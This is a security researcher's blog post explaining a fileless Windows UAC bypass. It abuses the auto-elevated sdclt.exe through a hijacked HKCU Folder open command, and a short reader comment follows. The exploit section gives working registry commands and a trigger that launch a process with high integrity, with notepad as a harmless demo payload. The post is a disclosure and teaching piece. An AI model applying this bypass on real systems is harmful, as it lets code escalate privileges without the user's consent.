You are here : Home » Learning security » Operating Systems » Windows » Yet another sdclt UAC bypass

Yet another sdclt UAC bypass

D 23 January 2019     H 15:31     A Emeric Nasi     C 1 messages


agrandir


License : Copyright Emeric Nasi, some rights reserved
This work is licensed under a Creative Commons Attribution 4.0 International License.
Creative Commons License

1. Origin of the bypass

As often with UAC, the flaw comes from an auto-elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window. If the user running with medium privileges can make these process load a dll or execute a command, UAC bypass is performed.

In our case, the executable is sdclt.exe. Sdclt is used in the context of Windows backup and restore mechanisms. You can check it auto-elevates using Sysinternals Sigcheck:

sigcheck.exe -m C:\Windows\System32\sdclt.exe | findstr autoElevate
       <autoElevate  xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</autoElevate>
Note: There are already a couple of known ways to abuse sdclt.exe into bypassing UAC. You can read about those two methods on Matt Nelson’s blog:

The method I found is fileless and is based on COM hijacking.
Some interesting events which occur when sdclt.exe is called from a medium integrity process:

  • It runs another process of sdclt.exe with high privilege
  • The high privilege sdclt process calls C:\Windows\System32\control.exe
  • Control.exe process runs with high privilege and ....
PNG - 7.9 kb

Using Sysinternals Procmon, we can see that control.exe is failing to find an open command for the "folder" object in the current user registry (HKCU).

This is very good sign for someone looking to bypass UAC! That is because UAC privileges are not required to write in there so we can basically make an elevated process run a command even if we are in the context of medium integrity process.

2. Exploit the bypass

You can easily test this UAC bypass with a few command lines.
Setup the registry:
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f

Trigger the bypass:
%windir%\system32\sdclt.exe

You can watch notepad.exe pop with high integrity level.

PNG - 10.4 kb

After that, do not forget to clean the registry with:
reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f

Also in this section

2 February 2022 – MSDT DLL Hijack UAC bypass

15 July 2021 – Hide HTA window for RedTeam

24 February 2019 – Bypass Windows Defender Attack Surface Reduction

23 June 2018 – Advanced USB key phishing

7 February 2018 – Hacking around HTA files

1 Forum posts

  • Modifying the "DelegateExecute" value to something else results in Windows Explorer not being able to open folders, LMAO.

    Thanks for reminding us to clear the registry modifications afterwards. I was going nuts about this, since I was testing a couple fileless techniques and I didn’t know which one caused this particular issue, so I had to go through all of them to find which did it.


Any message or comments?
pre-moderation

This forum is moderated before publication: your contribution will only appear after being validated by an administrator.

Who are you?
Your post